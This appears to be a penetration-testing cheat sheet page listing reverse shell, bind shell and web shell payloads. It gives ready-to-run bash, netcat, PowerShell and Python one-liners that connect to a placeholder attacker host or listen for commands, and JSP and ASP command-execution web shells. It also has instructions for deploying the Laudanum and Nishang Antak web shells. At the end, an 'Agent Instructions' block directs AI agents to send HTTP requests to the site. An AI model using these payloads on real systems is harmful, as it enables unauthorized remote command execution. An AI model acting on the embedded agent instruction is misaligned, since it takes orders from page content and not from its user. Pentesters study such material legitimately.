# Reverse Shells + Bind + Web ## Listen * Typical `netcat` * `-l` listen * `-v` verbose * `-n` No DNs resolution * `-p ` port ## Payloads More at [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) Also at [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/) great one: ### Bash ```bash bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' ``` ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f ``` ### Powershell ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()" ``` *** ## Sanitization/Stabilization/Upgrading TTY After connecting, often the shell is unstable and can be weird to use. ```shell-session python -c 'import pty; pty.spawn("/bin/bash")' ``` Then `CTRL + Z` to go back to local shell ```shell-session stty raw -echo fg ``` Then we should have a stable shell but not using all screen. On a **local** shell: ```shell-session echo $TERM ``` ```shell-session stty size ``` On **remote** shell: ```shell-session export TERM= ``` ```shell-session stty rows columns ``` *** ## Bind Shell ### Bash ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f ``` ### Python ```python python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' ``` ### Powershell ```powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(); ``` *** ## Web shell This is also covered in [File Inclusion](/file-inclusion.md) ### PHP ```php ``` ### JSP ```jsp <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ``` ### ASP ```aspnet <% eval request("cmd") %> ``` Default webroots: | Web Server | Default Webroot | | ---------- | ---------------------- | | `Apache` | /var/www/html/ | | `Nginx` | /usr/local/nginx/html/ | | `IIS` | c:\inetpub\wwwroot\\ | | `XAMPP` | C:\xampp\htdocs\\ | ### ASP shells #### Laudanum, One Webshell to Rule Them All You can get it [here](https://github.com/jbarcia/Web-Shells/tree/master/laudanum). Laudanum is built into Parrot OS and Kali by default. The Laudanum files can be found in the `/usr/share/laudanum` directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you must edit the file first to insert your `attacking` host IP address ```shell-session cp /usr/share/laudanum/aspx/shell.aspx ~/demo.aspx ``` Add your IP address to the `allowedIps` variable on line `59`. #### Antak Webshell Antak is a web shell built-in ASP.Net included within the [Nishang project](https://github.com/samratashok/nishang). Nishang is an Offensive PowerShell toolset that can provide options for any portion of your pentest. ```bash git clone https://github.com/samratashok/nishang.git ``` ```bash cp nishang/Antak-WebShell/antak.aspx ~/Upload.aspx ``` Modify the file
### PHP Shells [WhiteWinterWolf](https://github.com/WhiteWinterWolf/wwwolf-php-webshell) ### Considerations when Dealing with Web Shells When utilizing web shells, consider the below potential issues that may arise during your penetration testing process: * Web applications sometimes automatically delete files after a pre-defined period * Limited interactivity with the operating system in terms of navigating the file system, downloading and uploading files, chaining commands together may not work (ex. `whoami && hostname`), slowing progress, especially when performing enumeration -Potential instability through a non-interactive web shell * Greater chance of leaving behind proof that we were successful in our attack {% hint style="success" %} Also, we must document every method we attempt, what worked & what did not work, and even the names of the payloads & files we tried to use. We could include a sha1sum or MD5 hash of the file name, upload locations in our reports as proof, and provide attribution. {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.rtlcopymemory.com/shells-and-payloads/reverse-shells-+-bind-+-web.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.